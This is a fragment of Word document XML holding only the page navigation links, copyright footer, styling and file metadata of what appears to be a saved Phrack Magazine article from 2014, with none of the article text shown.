      <w:proofErr w:type="gramEnd"/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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "http://www.phrack.org/issues/68/1.html" \o "Issues" </w:instrText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fldChar w:fldCharType="separate"/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t>Issues</w:t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fldChar w:fldCharType="end"/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t xml:space="preserve"> ] </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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t>[ </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "http://www.phrack.org/authors.html" \o "Authors" </w:instrText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fldChar w:fldCharType="separate"/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t>Authors</w:t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fldChar w:fldCharType="end"/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t xml:space="preserve"> ] </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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t>[ </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "http://www.phrack.org/archives/" \o "Archives" </w:instrText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fldChar w:fldCharType="separate"/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t>Archives</w:t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fldChar w:fldCharType="end"/>
      </w:r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t xml:space="preserve"> ] </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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t>[ </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:hyperlink r:id="rId4" w:tooltip="Contact" w:history="1">
        <w:r w:rsidRPr="006A418A">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="FFFFFF"/>
            <w:spacing w:val="15"/>
            <w:sz w:val="17"/>
            <w:szCs w:val="17"/>
            <w:lang w:eastAsia="en-GB"/>
          </w:rPr>
          <w:t>Contact</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006A418A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A418A" w:rsidRPr="006A418A" w:rsidRDefault="006A418A" w:rsidP="006A418A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A418A">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>© Copyleft 1985-2014, Phrack Magazine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0023117F" w:rsidRDefault="0023117F"/>
    <w:sectPr w:rsidR="0023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18A"/>
    <w:rsid w:val="000B2F39"/>
    <w:rsid w:val="0023117F"/>
    <w:rsid w:val="00541D8B"/>
    <w:rsid w:val="006A418A"/>
    <w:rsid w:val="00A0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AEB92-0681-4FA7-9F14-760C9767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18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7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071">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="1" w:color="808080"/>
                <w:left w:val="single" w:sz="6" w:space="1" w:color="808080"/>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="808080"/>
                <w:right w:val="single" w:sz="6" w:space="1" w:color="808080"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="19390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4" w:space="3" w:color="808080"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="9081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000000"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="17163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412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none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="single" w:sz="12" w:space="0" w:color="000000"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="13529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000000"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                    <w:div w:id="18217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00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071089">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="3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rack.org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29</Pages>
  <Words>11064</Words>
  <Characters>63066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2014-09-28T17:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-09-30T02:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>